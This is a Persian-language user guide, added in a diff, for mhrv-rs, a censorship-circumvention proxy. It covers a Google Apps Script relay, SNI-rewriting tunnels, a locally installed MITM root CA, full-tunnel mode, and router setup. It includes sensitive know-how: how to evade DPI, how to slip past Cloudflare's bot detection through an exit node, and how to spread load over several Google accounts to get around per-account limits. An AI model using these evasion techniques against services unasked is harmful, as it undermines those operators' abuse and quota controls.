+> **نکتهٔ مهم اندروید (issueهای [#74](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/74) و [#81](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/81)):** TUN تمام ترافیک IP را می‌گیرد، اما HTTPS از برنامه‌های third-party فقط برای برنامه‌هایی کار می‌کند که به CAهای نصب‌شدهٔ کاربر اعتماد می‌کنند. از اندروید ۷ به بعد، برنامه‌ها باید با `networkSecurityConfig` صراحتاً اعلام کنند که به CAهای کاربر اعتماد دارند. **کروم و فایرفاکس این کار را می‌کنند**؛ **تلگرام، واتس‌اَپ، اینستاگرام، یوتیوب، برنامه‌های بانکی، بازی‌ها** نمی‌کنند. برای آن‌ها: حالت `PROXY_ONLY` و در داخل برنامه `127.0.0.1:1081` (SOCKS5)، یا حالت `google_only` (بدون CA، فقط سرویس‌های گوگل)، یا `upstream_socks5` به یک VPS خارجی. این طراحی امنیتی اندروید است نه باگ این برنامه.
+
+### محتوای هر release
+
+هر آرشیو شامل:
+
+| فایل | کاربرد |
+|---|---|
+| `mhrv-rs` / `mhrv-rs.exe` | CLI. استفادهٔ headless، سرور، اتوماسیون. روی مک / ویندوز بدون وابستگی سیستمی. |
+| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | UI دسکتاپ (egui). فرم کانفیگ، دکمه‌های Start / Stop / Test، آمار زنده، پنل log. |
+| `run.sh` / `run.command` / `run.bat` | راه‌انداز پلتفرم: گواهی MITM را نصب می‌کند (نیاز به sudo / admin) و UI را باز می‌کند. در اولین اجرا از این استفاده کن. |
+
+آرشیوهای مک شامل `mhrv-rs.app` (در `*-app.zip`) هم هستند — در Finder دو بار کلیک کن. یک‌بار `mhrv-rs --install-cert` یا `run.command` را اجرا کن تا CA نصب شود.
+
+<p align="center"><img src="ui-screenshot.png" alt="UI دسکتاپ mhrv-rs شامل فرم کانفیگ، آمار ترافیک زنده، دکمه‌های Start/Stop/Test و پنل log" width="420"></p>
+
+UI لینوکس به این کتابخانه‌ها نیاز دارد: `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. روی اکثر توزیع‌های دسکتاپی از قبل نصب‌اند؛ روی سیستم headless یا با package manager نصب کن یا از CLI استفاده کن.
+
+## محل ذخیرهٔ فایل‌ها
+
+کانفیگ و گواهی MITM در دایرکتوری user-data سیستم‌عامل قرار می‌گیرند:
+
+- مک: `~/Library/Application Support/mhrv-rs/`
+- لینوکس: `~/.config/mhrv-rs/`
+- ویندوز: `%APPDATA%\mhrv-rs\`
+
+داخل آن دایرکتوری:
+
+- `config.json` — تنظیمات تو (با دکمهٔ Save در UI نوشته می‌شود یا دستی)
+- `ca/ca.crt`, `ca/ca.key` — گواهی root MITM. کلید خصوصی فقط در دست توست.
+
+CLI همچنین برای سازگاری با راه‌اندازی‌های قدیمی، روی `./config.json` در دایرکتوری جاری هم fallback دارد.
+
+## دیپلوی Apps Script
+
+نسخهٔ ۵ دقیقه‌ای در [README اصلی](../README.md#مرحلهٔ-۱--ساخت-اسکریپت-گوگل-یک‌بار) است. این بخش به نسخه‌های جایگزین می‌پردازد.
+
+### نسخهٔ Cloudflare Worker
+
+یک نسخهٔ جایگزین در [`assets/apps_script/Code.cfw.gs`](../assets/apps_script/Code.cfw.gs) به‌همراه [`assets/cloudflare/worker.js`](../assets/cloudflare/worker.js) وجود دارد که Apps Script را به یک رلهٔ نازک تبدیل می‌کند و کار `fetch` واقعی را به یک Cloudflare Worker که خودت دیپلوی می‌کنی می‌سپارد. **سود روز اول:** کاهش تأخیر (~۱۰ تا ۵۰ میلی‌ثانیه روی لبهٔ CF در مقابل ۲۵۰ تا ۵۰۰ میلی‌ثانیه Apps Script — برای مرور وب و تلگرام محسوس).
+
+سهمیهٔ روزانهٔ ۲۰٬۰۰۰ `UrlFetchApp` را کاهش **نمی‌دهد**، چون امروز mhrv-rs همیشه درخواست تک‌URL می‌فرستد؛ مسیر دسته‌ای روی GAS+Worker سیم‌کشی شده (`ceil(N/40)` سهمیه به‌ازای دستهٔ N) ولی هیچ کلاینتی فعلاً تولیدش نمی‌کند.
+
+**مبادلات:**
+- ویدیوی طولانی یوتیوب بدتر است (دیوار ۳۰ ثانیه به جای ۶ دقیقه)
+- ضدبات Cloudflare را حل نمی‌کند
+- **با `mode: "full"` سازگار نیست** (پشتیبانی tunnel-ops ندارد → برای واتس‌اَپ / مسنجرها روی اندروید Full mode کمک نمی‌کند)
+
+راهنمای کامل و جدول مبادلات در [`assets/cloudflare/README.fa.md`](../assets/cloudflare/README.fa.md). در mhrv-rs هیچ تنظیمی تغییر نمی‌کند — همان `mode: "apps_script"`، همان `script_id`، همان `auth_key`.
+
+### حالت direct
+
+اگر ISP تو از قبل Apps Script (یا کل گوگل) را مسدود کرده، باید مرحلهٔ ۱ **اول** موفق شود — قبل از این‌که رله‌ای داشته باشی. mhrv-rs یک حالت `direct` دقیقاً برای این دارد — فقط تونل بازنویسی SNI، بدون رلهٔ Apps Script. (قبل از v1.9 نام `google_only` داشت — نام قدیمی هم پذیرفته می‌شود.)
+
+۱. فایل اجرایی را دانلود کن (طبق [مرحلهٔ ۲ در README](../README.md#مرحلهٔ-۲--دانلود-mhrv-rs))
+۲. فایل [`config.direct.example.json`](../config.direct.example.json) را در کنار فایل اجرا با نام `config.json` کپی کن — نه `script_id` نیاز است نه `auth_key`
+۳. `mhrv-rs serve` را اجرا کن و HTTP proxy مرورگرت را روی `127.0.0.1:8085` بگذار
+۴. در حالت `direct`، پروکسی فقط `*.google.com`، `*.youtube.com` و سایر میزبان‌های لبهٔ گوگل (به‌علاوهٔ هر [`fronting_groups`](fronting-groups.md) که تنظیم کرده باشی) را از تونل بازنویسی SNI رد می‌کند. بقیهٔ ترافیک به‌صورت TCP خام (raw) و مستقیم می‌رود — هنوز رله‌ای در کار نیست.
+۵. حالا مرحلهٔ ۱ را در مرورگر انجام بده (اتصال به `script.google.com` با SNI فرونت می‌شود). `Code.gs` را دیپلوی کن، Deployment ID را کپی کن.
+۶. در UI / اپ اندروید / یا با ویرایش `config.json`، حالت را به `apps_script` برگردان، Deployment ID و auth key را پیست کن، و دوباره استارت کن.
+
+برای بررسی دسترسی قبل از استارت پروکسی: `mhrv-rs test-sni` دامنه‌های `*.google.com` را مستقیم تست می‌کند و فقط به `google_ip` و `front_domain` نیاز دارد.
+
+## مرجع CLI
+
+تمام کاری که UI می‌کند را CLI هم می‌کند. `config.example.json` را به `config.json` کپی کن:
+
+```json
+{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
+  "auth_key": "same-secret-as-in-code-gs",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true
+}
+```
+
+سپس:
+
+```bash
+./mhrv-rs                   # اجرای پروکسی (پیش‌فرض)
+./mhrv-rs test              # تست یک درخواست کامل
+./mhrv-rs scan-ips          # رتبه‌بندی IPهای گوگل بر اساس سرعت
+./mhrv-rs test-sni          # تست نام‌های SNI روی google_ip
+./mhrv-rs --install-cert    # نصب مجدد گواهی
+./mhrv-rs --remove-cert     # حذف کامل: trust store + پوشهٔ ca/
+./mhrv-rs --help
+```
+
+`--remove-cert` گواهی را از trust store سیستم پاک می‌کند، با بررسی نام تأیید می‌کند که حذف انجام شد، و پوشهٔ `ca/` روی دیسک را حذف می‌کند. پاک‌سازی NSS (فایرفاکس و کروم لینوکس) best-effort است: اگر `certutil` نباشد یا یکی از مرورگرها پایگاه داده NSS را قفل کرده باشد، ابزار راهنمای پاک‌سازی دستی نشان می‌دهد. `config.json` و دیپلوی Apps Script دست‌نخورده می‌مانند، پس CA تازه نیازی به دیپلوی مجدد `Code.gs` ندارد.
+
+`script_id` می‌تواند JSON array باشد: `["id1", "id2", "id3"]`.
+
+### حالت scan-ips با API
+
+به‌طور پیش‌فرض، `scan-ips` از یک لیست ثابت استفاده می‌کند. کشف پویای IP را در `config.json` فعال کن:
+
+```json
+{
+  "fetch_ips_from_api": true,
+  "max_ips_to_scan": 100,
+  "scan_batch_size": 100,
+  "google_ip_validation": true
+}
+```
+
+وقتی فعال است:
+- فایل `goog.json` را از API محدوده‌های IP عمومی گوگل می‌گیرد
+- CIDRها را به IP تک‌تک گسترش می‌دهد
+- به IPهای دامنه‌های معروف گوگل اولویت می‌دهد (google.com، youtube.com، …)
+- به‌طور تصادفی تا `max_ips_to_scan` کاندید انتخاب می‌کند (اولویت‌داران اول)
+- فقط کاندیدها را برای اتصال و اعتبارسنجی frontend تست می‌کند
+
+ممکن است IPهایی پیدا کنی که سریع‌تر از لیست ثابت‌اند، اما تضمینی نیست همه کار کنند.
+
+## تلگرام با xray
+
+رلهٔ Apps Script فقط HTTP request/response می‌فهمد، پس پروتکل‌های غیر-HTTP (MTProto تلگرام، IMAP، SSH، TCP خام) نمی‌توانند از آن رد شوند. بدون چیز دیگری، این جریان‌ها به fallback مستقیم TCP می‌خورند — یعنی واقعاً tunnel نشده‌اند، و ISP که تلگرام را بسته همچنان می‌بندد.
+
+**راه‌حل:** یک [xray](https://github.com/XTLS/Xray-core) (یا v2ray / sing-box) محلی با outbound VLESS / Trojan / Shadowsocks به VPS شخصی خودت اجرا کن، و mhrv-rs را با فیلد **Upstream SOCKS5** (یا کلید `upstream_socks5`) به SOCKS5 inbound آن xray وصل کن. وقتی تنظیم شد، جریان‌های TCP خام که از SOCKS5 listener mhrv-rs می‌آیند به xray → تونل واقعی زنجیر می‌شوند.
+
+```
+تلگرام  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
+        ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ بازنویسی SNI ───────── google.com, youtube.com, …
+مرورگر  ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── VPS تو   (تلگرام، IMAP، SSH، TCP خام)
+```
+
+قطعهٔ کانفیگ:
+
+```json
+{
+  "upstream_socks5": "127.0.0.1:50529"
+}
+```
+
+HTTP / HTTPS مثل قبل از Apps Script می‌رود (تغییری نمی‌کند)، تونل بازنویسی SNI برای `google.com` / `youtube.com` همچنان از هر دو دور می‌زند — یوتیوب به سرعت قبل می‌ماند و تلگرام هم تونل واقعی پیدا می‌کند.
+
+## حالت تونل کامل
+
+`"mode": "full"` **تمام** ترافیک را end-to-end از Apps Script و یک [tunnel-node](../tunnel-node/) راه دور رد می‌کند — بدون نیاز به نصب گواهی MITM. TCP به‌صورت سشن‌های پایدار تونل می‌شود، و UDP از کلاینت‌های اندروید / TUN از طریق SOCKS5 `UDP ASSOCIATE` به tunnel-node می‌رسد که UDP واقعی را از سمت سرور می‌فرستد. مبادله: تأخیر بیشتر هر درخواست (هر بایت مسیر Apps Script → tunnel-node → مقصد را طی می‌کند)، اما برای هر پروتکل و هر برنامه‌ای بدون نصب CA کار می‌کند.
+
+### تأثیر تعداد Deployment
+
+هر دور بَچ Apps Script حدود ۲ ثانیه طول می‌کشد. در Full mode، mhrv-rs یک **مالتی‌پلکسر بَچ پیپلاین‌شده** اجرا می‌کند که چند بَچ همزمان می‌فرستد بدون اینکه منتظر پاسخ قبلی بماند. هر Deployment ID (= یک حساب گوگل) حوضچهٔ همزمانی مخصوص خودش با **۳۰ درخواست فعال** دارد — مطابق سقف اجرای همزمان Apps Script per-account.
+
+```
+حداکثر همزمانی = ۳۰ × تعداد Deployment IDها
+```
+
+| Deployment | همزمانی | |
+|---|---|---|
+| ۱ | ۳۰ | یک حساب — برای مرور سبک کافی |
+| ۳ | ۹۰ | مناسب استفادهٔ روزانه |
+| ۶ | ۱۸۰ | توصیه‌شده برای استفادهٔ سنگین |
+| ۱۲ | ۳۶۰ | چند حساب — حداکثر توان |
+
+بیشتر Deployment = همزمانی بیشتر = تأخیر کمتر هر سشن. هر بَچ بین IDها چرخش می‌کند و بار به‌طور یکنواخت توزیع می‌شود، پس احتمال رسیدن به سقف سهمیهٔ یک Deployment کاهش می‌یابد.
+
+**محافظ‌های منابع:**
+- **حداکثر ۵۰ op** در هر بَچ — اگر سشن‌های فعال بیشتر باشند، مالتی‌پلکسر چند بَچ می‌فرستد
+- **سقف payload ۴ مگابایت** در هر بَچ — خیلی کمتر از ۵۰ مگابایت Apps Script
+- **timeout ۳۰ ثانیه** هر بَچ — مقصد کند / مرده نمی‌تواند سایر سشن‌ها را گیر بیاندازد
+
+### راه‌اندازی سریع حالت full
+
+۱. [`CodeFull.gs`](../assets/apps_script/CodeFull.gs) را به‌عنوان Web App روی **هر حساب گوگل** دیپلوی کن (همان مراحل `Code.gs`، اما با اسکریپت full-mode که به tunnel-node تو forward می‌کند). یک Deployment per account — سقف ۳۰ همزمان per account است، چند Deployment روی یک حساب سهمیه را زیاد نمی‌کند. برای مقیاس، حساب‌های بیشتر:
+   - **استفادهٔ تنها** → ۱-۲ حساب
+   - **اشتراک با ~۳ نفر** → ۳ حساب
+   - **اشتراک با گروه** → یک حساب per کاربر سنگین
+
+۲. [tunnel-node](../tunnel-node/) را روی VPS دیپلوی کن. سریع‌ترین راه ایمیج Docker آماده:
+   ```bash
+   docker run -d --name mhrv-tunnel --restart unless-stopped \
+     -p 8080:8080 -e TUNNEL_AUTH_KEY=رمز_قوی_تو \
+     ghcr.io/therealaleph/mhrv-tunnel-node:latest
+   ```
+   Multi-arch (linux/amd64 + linux/arm64)، اجرا با کاربر غیر root، حدود ۳۲ مگابایت فشرده. برای production نسخهٔ مشخص (`:1.5.0`) را pin کن. راهنمای کامل (شامل Cloud Run، docker-compose، بیلد از سورس) در [tunnel-node/README.fa.md](../tunnel-node/README.fa.md).
+
+۳. در کانفیگت `"mode": "full"` با همهٔ Deployment IDها بگذار:
+   ```json
+   {
+     "mode": "full",
+     "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
+     "auth_key": "secret-تو"
+   }
+   ```
+
+## Exit node
+
+سرویس‌های پشت Cloudflare (chatgpt.com، claude.ai، grok.com، x.com، openai.com) ترافیک از IPهای دیتاسنتر گوگل را به‌عنوان bot شناسایی می‌کنند و چالش Turnstile / CAPTCHA می‌فرستند. راه‌حل exit node یک handler کوچک TypeScript است که روی یک host serverless (Deno Deploy، fly.io، یا VPS شخصی خودت) دیپلوی می‌کنی و بین Apps Script و مقصد قرار می‌گیرد:
+
+```
+کلاینت → Apps Script (IP گوگل) → exit node خودت (IP غیر گوگل) → سایت پشت CF
+```
+
+مقصد IP خروجی exit node را می‌بیند نه IP گوگل، پس heuristic ضدبات شلیک نمی‌کند.
+
+**راه‌اندازی:** [`assets/exit_node/README.fa.md`](../assets/exit_node/README.fa.md). ۵ دقیقه، سهمیهٔ رایگان.
+
+## اشتراک‌گذاری هات‌اسپات
+
+mhrv-rs به‌طور پیش‌فرض روی `0.0.0.0` گوش می‌دهد، پس هر دستگاه روی همان شبکه می‌تواند ازش استفاده کند. سناریوی رایج: اشتراک تونل از گوشی اندروید به آیفون / آیپد / لپ‌تاپ از هات‌اسپات:
+
+۱. **اندروید:** هات‌اسپات موبایل را روشن کن + اپ را استارت کن
+۲. **دستگاه دیگر:** به Wi-Fi هات‌اسپات اندروید وصل شو
+۳. **پروکسی** را روی دستگاه دیگر تنظیم کن:
+   - سرور: `192.168.43.1` (IP پیش‌فرض هات‌اسپات اندروید)
+   - پورت: `8080` (HTTP) یا `1081` (SOCKS5)
+
+### iOS
+
+Settings → Wi-Fi → روی (i) شبکهٔ هات‌اسپات بزن → Configure Proxy → Manual → سرور `192.168.43.1`، پورت `8080`.
+
+برای پوشش سراسری در iOS، از [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) یا [Potatso](https://apps.apple.com/app/potatso/id1239860606) استفاده کن — به SOCKS5 (`192.168.43.1:1081`) وصلش کن، تمام ترافیک از تونل می‌رود.
+
+### مک / ویندوز
+
+HTTP proxy سیستم را روی `192.168.43.1:8080` بگذار، یا per-app SOCKS5 روی `192.168.43.1:1081`.
+
+> اگر `listen_host` در کانفیگت `127.0.0.1` است، به `0.0.0.0` تغییرش بده تا اتصال از دستگاه‌های دیگر را بپذیرد.
+
+## اجرا روی OpenWRT
+
+آرشیوهای `*-linux-musl-*` یک CLI کاملاً استاتیک می‌فرستند که روی OpenWRT، Alpine، و هر لینوکس بدون libc اجرا می‌شود. فایل را روی روتر بگذار و به‌صورت سرویس استارت کن:
+
+```sh
+# از کامپیوتری که به روترت دسترسی دارد:
+scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
+scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
+scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+
+# روی روتر (ssh):
+chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
+/etc/init.d/mhrv-rs enable
+/etc/init.d/mhrv-rs start
+logread -e mhrv-rs -f       # تمام لاگ
+```
+
+دستگاه‌های LAN HTTP proxy را روی IP روتر (پورت پیش‌فرض `8085`) یا SOCKS5 روی `<router-ip>:8086` تنظیم می‌کنند. در `/etc/mhrv-rs/config.json` مقدار `listen_host` را به `0.0.0.0` بگذار تا روتر اتصال LAN را بپذیرد.
+
+مصرف حافظه ~۱۵–۲۰ مگابایت — روی هر روتری با ۱۲۸ مگابایت RAM به بالا اجرا می‌شود. UI روی musl نیست (روترها headlessاند).
+
+## ابزارهای تشخیص
+
+- **`mhrv-rs test`** — یک درخواست از طریق رله می‌فرستد، موفقیت / تأخیر گزارش می‌دهد. اولین کاری که باید بکنی وقتی چیزی خراب است — جدا می‌کند "رله سالم است" از "کانفیگ کلاینت غلط است".
+- **`mhrv-rs scan-ips`** — تست TLS موازی روی ۲۸ IP frontend شناخته‌شدهٔ گوگل، مرتب‌شده بر اساس تأخیر. بهترین را در `google_ip` بگذار. UI همان را پشت دکمهٔ **scan** دارد.
+- **`mhrv-rs test-sni`** — تست TLS موازی هر نام SNI در pool روی `google_ip`. می‌گوید کدام نام‌ها از DPI ISP رد می‌شوند. UI در پنجرهٔ **SNI pool…** همان را با چک‌باکس، دکمهٔ **Test** هر ردیف، و **Keep ✓ only** برای trim خودکار دارد.
+- **آمار دوره‌ای** هر ۶۰ ثانیه در سطح `info` لاگ می‌شود (تماس‌های رله، نرخ hit کش، بایت رله شده، اسکریپت‌های فعال در مقابل blacklisted). UI آن را زنده نشان می‌دهد.
+
+### ویرایشگر SNI pool
+
+به‌طور پیش‌فرض mhrv-rs بین `{www, mail, drive, docs, calendar}.google.com` روی TLS خروجی به `google_ip` می‌چرخد، تا اثر انگشت ترافیک یکنواخت نباشد. بعضی‌ها ممکن است محلی مسدود شوند (مثلاً `mail.google.com` در ایران چند بار هدف بوده).
+
+برای تنظیم pool یکی از این دو راه را انتخاب کن:
+
+- UI → **SNI pool…** → **Test all** → **Keep ✓ only** برای trim خودکار. نام جدید را در فیلد پایین اضافه کن. Save.
+- یا `config.json` را مستقیم ویرایش کن:
+
+```json
+{
+  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
+}
+```
+
+اگر `sni_hosts` تنظیم نشود، pool خودکار پیش‌فرض استفاده می‌شود. `mhrv-rs test-sni` را اجرا کن تا قبل از ذخیره ببینی چه چیزی از شبکه‌ات کار می‌کند.
+
+## چه چیز پیاده شده و چه چیز نه
+
+این پورت روی **حالت `apps_script`** تمرکز دارد — تنها حالتی که در سال ۲۰۲۶ مقابل سانسورگر مدرن قابل اتکاست.
+
+### پیاده‌شده
+
+| ویژگی | توضیح |
+|---|---|
+| HTTP proxy محلی | CONNECT برای HTTPS، forwarding ساده برای HTTP |
+| SOCKS5 محلی | dispatch هوشمند TLS / HTTP / TCP خام (تلگرام، xray، …) |
+| MITM | تولید گواهی per-domain روی پرواز با `rcgen` |
+| نصب CA | تولید + نصب خودکار روی مک / لینوکس / ویندوز |
+| پشتیبانی فایرفاکس | نصب گواهی NSS با `certutil` (best-effort) |
+| رلهٔ JSON | پروتکل سازگار با `Code.gs` |
+| Connection pool | TTL ۴۵ ثانیه، حداکثر ۲۰ idle |
+| رمزگشایی gzip | اتوماتیک |
+| چند اسکریپت | چرخش round-robin |
+| Blacklist خودکار | روی خطای 429 / quota، با cooldown ۱۰ دقیقه |
+| کش پاسخ | ۵۰ مگابایت، FIFO + TTL، آگاه از `Cache-Control: max-age`، heuristic برای static asset |
+| Coalescing | GETهای یکسان همزمان یک fetch upstream را به اشتراک می‌گذارند |
+| تونل بازنویسی SNI | مستقیم به لبهٔ گوگل (بدون رله) برای `google.com`، `youtube.com`، `youtu.be`، `youtube-nocookie.com`، `fonts.googleapis.com` — دامنه‌های اضافی از فیلد `hosts` |
+| هندل ریدایرکت | اتوماتیک: `/exec` → `googleusercontent.com` |
+| فیلتر هدر | حذف connection-specific و brotli |
+| Subcommand‌ها | `test` و `scan-ips` و `test-sni` |
+| ماسک Script ID | به‌صورت `prefix…suffix` در لاگ، تا Deployment ID افشا نشود |
+| UI دسکتاپ | egui — کراس‌پلتفرم، بدون bundler |
+| چِین SOCKS5 upstream | اختیاری برای ترافیک غیر-HTTP (MTProto تلگرام، IMAP، SSH …) |
+| Pre-warm pool | اولین درخواست TLS handshake به لبهٔ گوگل را skip می‌کند |
+| چرخش SNI per-connection | بین `{www, mail, drive, docs, calendar}.google.com` |
+| Parallel relay | اختیاری: fan-out به N اسکریپت همزمان، اولین موفقیت برمی‌گردد |
+| Drill-down آمار per-site | در UI: درخواست‌ها، نرخ کش، بایت، تأخیر متوسط هر host |
+| ویرایشگر pool SNI | UI + فیلد `sni_hosts` با probe دسترسی |
+| بیلد musl | OpenWRT / Alpine / محیط‌های بدون libc — باینری استاتیک، با procd init |
+| **Exit node** | برای سایت‌های پشت Cloudflare (v1.9.4+) |
+| **Unwrap goog.script.init** | دفاع‌در‌عمق در مقابل Deploymentهایی که پاسخ HtmlService-wrapped می‌فرستند (v1.9.6+) |
+
+### عمداً پیاده نشده
+
+| ویژگی | چرا نه |
+|---|---|
+| HTTP/2 multiplexing | state machine کریت `h2` (stream IDs، flow control، GOAWAY) موارد hang ظریف زیادی دارد؛ coalescing + pool ۲۰-conn بیشتر فایده را می‌گیرد |
+| Batch (`q:[...]` در apps_script) | connection pool + tokio async از قبل خوب موازی‌سازی می‌کند؛ batch ~۲۰۰ خط مدیریت state اضافه می‌کند با سود نامشخص |
+| Range-based parallel download | edge case‌های واقعی (سرورهای بدون Range، chunked وسط stream)؛ ویدیوی یوتیوب از قبل با تونل بازنویسی SNI، Apps Script را دور می‌زند |
+| حالت‌های `domain_fronting` / `google_fronting` / `custom_domain` | Cloudflare در ۲۰۲۴ domain fronting عمومی را کشت؛ Cloud Run پلن پولی می‌خواهد |
+
+## محدودیت‌های شناخته‌شده
+
+این محدودیت‌ها ذاتی روش Apps Script + domain fronting هستند، نه باگ این کلاینت. نسخهٔ پایتون اصلی هم همین مشکلات را دارد.
+
+### User-Agent ثابت روی `Google-Apps-Script`
+
+برای ترافیکی که از رله رد می‌شود، `UrlFetchApp.fetch()` اجازهٔ override کردن User-Agent را نمی‌دهد. سایت‌هایی که bot detect می‌کنند (جست‌وجوی گوگل، بعضی CAPTCHAها) نسخهٔ no-JS برمی‌گردانند.
+
+**راه‌حل:** دامنه را به فیلد `hosts` اضافه کن تا از تونل بازنویسی SNI با User-Agent واقعی مرورگرت برود. این دامنه‌ها پیش‌فرض داخل‌اند: `google.com`، `youtube.com`، `fonts.googleapis.com`.
+
+### پخش ویدیو کند و quota-محدود
+
+HTML یوتیوب سریع می‌آید (از تونل بازنویسی SNI)، اما chunkهای ویدیو از `googlevideo.com` از Apps Script رد می‌شوند. سهمیهٔ رایگان: ~۲۰٬۰۰۰ `UrlFetchApp` در روز، سقف بدنهٔ ۵۰ مگابایت per fetch.
+
+برای مرور متنی خوب است، برای ۱۰۸۰p دردناک. چند `script_id` بچرخان برای هد روم بیشتر، یا VPN واقعی برای ویدیو.
+
+### Brotli حذف می‌شود
+
+از هدر `Accept-Encoding` ‏`br` حذف می‌شود. Apps Script gzip را decompress می‌کند ولی Brotli نه؛ forward کردن `br` پاسخ را خراب می‌کند. سربار حجمی جزئی.
+
+### WebSocket کار نمی‌کند
+
+این رله request/response JSON است. سایت‌هایی که به WebSocket upgrade می‌کنند fail می‌شوند (streaming ChatGPT، صدای Discord، …).
+
+### سایت‌های HSTS-preloaded / hard-pinned
+
+گواهی MITM را قبول نمی‌کنند. اکثر سایت‌ها مشکل ندارند؛ تعداد کمی هستند.
+
+### هشدار «دستگاه ناشناس» در ورود حساس گوگل
+
+2FA و ورودهای حساس گوگل / یوتیوب ممکن است هشدار «دستگاه ناشناس» بدهند، چون درخواست‌ها از IPهای Apps Script گوگل می‌آیند نه IP تو. یک‌بار از تونل وارد شو تا این مشکل برطرف شود (دامنهٔ `google.com` در لیست بازنویسی SNI است، پس از همان IP که قبلاً ورود کرده‌ای می‌رود).
+
+## امنیت
+
+- root MITM **فقط روی سیستم تو می‌ماند**. کلید خصوصی `ca/ca.key` محلی تولید می‌شود و هیچ‌وقت از دایرکتوری user-data خارج نمی‌شود.
+- `auth_key` رمز اشتراکی است که خودت انتخاب می‌کنی. `Code.gs` سرور هر درخواست بدون این کلید را رد می‌کند.
+- ترافیک بین سیستم تو و لبهٔ گوگل TLS 1.3 استاندارد است.
+- آنچه گوگل می‌بیند: URL مقصد و هدرهای هر درخواست (چون Apps Script به‌جای تو fetch می‌کند). همان مدل اعتماد هر پروکسی هاست‌شده — اگر قابل قبول نیست، VPN خودمیزبانی استفاده کن.
+- **هشدار افشای IP در حالت `apps_script`:** v1.2.9 همهٔ هدرهای `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` و ~۱۰ هدر مشابه را قبل از رسیدن به Apps Script از خروجی حذف می‌کند ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). آنچه پوشش **نمی‌دهد**: هر هدری که زیرساخت گوگل ممکن است وقتی Apps Script `UrlFetchApp.fetch()` بعدی را به مقصد می‌فرستد اضافه کند. آن leg دوم سمت سرور است، خارج از کنترل این کلاینت. مقصد IP دیتاسنتر گوگل را می‌بیند، اما تعهد عمومی از گوگل وجود ندارد که IP اصلی کاربر را در زنجیرهٔ هدرهای داخلی منتشر نمی‌کند. اگر مدل تهدیدت اینه که مقصد تحت هیچ شرایطی نباید IP تو را بفهمد، **از Full Tunnel استفاده کن** (ترافیک از VPS شخصی تو خارج می‌شود، فقط IP آن VPS end-to-end دیده می‌شود). حالت `apps_script` برای دور زدن DPI / دسترسی به سایت‌های فیلتر کاملاً مناسب است، اما فرض می‌کند «دیده‌شدن توسط گوگل» قابل قبول است. در [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148) مطرح شده.
+- در v1.9.6+ `Code.gs` و `CodeFull.gs` هم هدرهای `X-Forwarded-*` / `Forwarded` / `Via` را در سمت سرور به‌عنوان لایهٔ دفاع دوم حذف می‌کنند.
+
+## سؤالات رایج
+
+**چند Deployment ID نیاز دارم؟** یکی برای استفادهٔ معمول کافی است. سهمیهٔ رایگان `UrlFetchApp` هر حساب ۲۰٬۰۰۰ fetch در روز است (Workspace پولی ۱۰۰٬۰۰۰)، با سقف بدنهٔ ۵۰ مگابایت per fetch. **یک Deployment per Google account** بساز — سقف ۳۰ همزمان per account است، چند Deployment روی یک حساب همزمانی اضافه نمی‌کند. برای مقیاس، در حساب‌های گوگل دیگر دیپلوی کن. مرجع: <https://developers.google.com/apps-script/guides/services/quotas>
+
+**چرا گاهی جست‌وجوی گوگلم بدون JavaScript نشان داده می‌شود؟** Apps Script مجبور است `User-Agent` را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به‌عنوان bot شناسایی کرده و نسخهٔ no-JS برمی‌گردانند. دامنه‌هایی که در لیست SNI-rewrite هستند (`google.com`، `youtube.com`، …) از این مشکل امان‌اند چون مستقیم از لبهٔ گوگل می‌آیند، نه از Apps Script.
+
+**ورود به حساب گوگل با این ابزار ایمن است؟** توصیه: یک‌بار **بدون** پروکسی یا با VPN واقعی وارد شو. گوگل ممکن است IP Apps Script را به‌عنوان "دستگاه ناشناس" ببیند و هشدار بدهد. بعد از ورود اولیه، استفاده بی‌مشکل است.
+
+**چطور گواهی را بعداً حذف کنم؟**
+- **ساده‌ترین (هر OS):** در UI **Remove CA** را بزن، یا:
+  - مک / لینوکس: `sudo ./mhrv-rs --remove-cert`
+  - ویندوز (با Run as administrator): `mhrv-rs.exe --remove-cert`
+  - گواهی را از trust store سیستم و NSS (فایرفاکس / کروم لینوکس) حذف می‌کند، و `ca/ca.crt` + `ca/ca.key` را روی دیسک پاک می‌کند. `config.json` و دیپلوی Apps Script دست‌نخورده می‌مانند.
+- **به‌صورت دستی:** نام گواهی (Common Name) همه‌جا `MasterHttpRelayVPN` است (نه `mhrv-rs` — این نام برنامه است نه نام گواهی).
+  - **مک:** Keychain Access → System → دنبال `MasterHttpRelayVPN` بگرد → حذف کن. سپس `rm -rf ~/Library/Application\ Support/mhrv-rs/ca/`
+  - **ویندوز:** `certmgr.msc` → Trusted Root Certification Authorities → دنبال `MasterHttpRelayVPN` → حذف
+  - **لینوکس:** `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` را حذف کن، بعد `sudo update-ca-certificates`
+
+**خطای `GLIBC_2.39 not found` روی لینوکس؟** از `mhrv-rs-linux-musl-amd64.tar.gz` استفاده کن — کاملاً استاتیک، روی هر لینوکس بدون `glibc` کار می‌کند.
+
+## لایسنس
+
+MIT. [LICENSE](../LICENSE) را ببین.
+
+</div>
diff --git a/docs/guide.md b/docs/guide.md
new file mode 100644
index 00000000..55ee955e
--- /dev/null
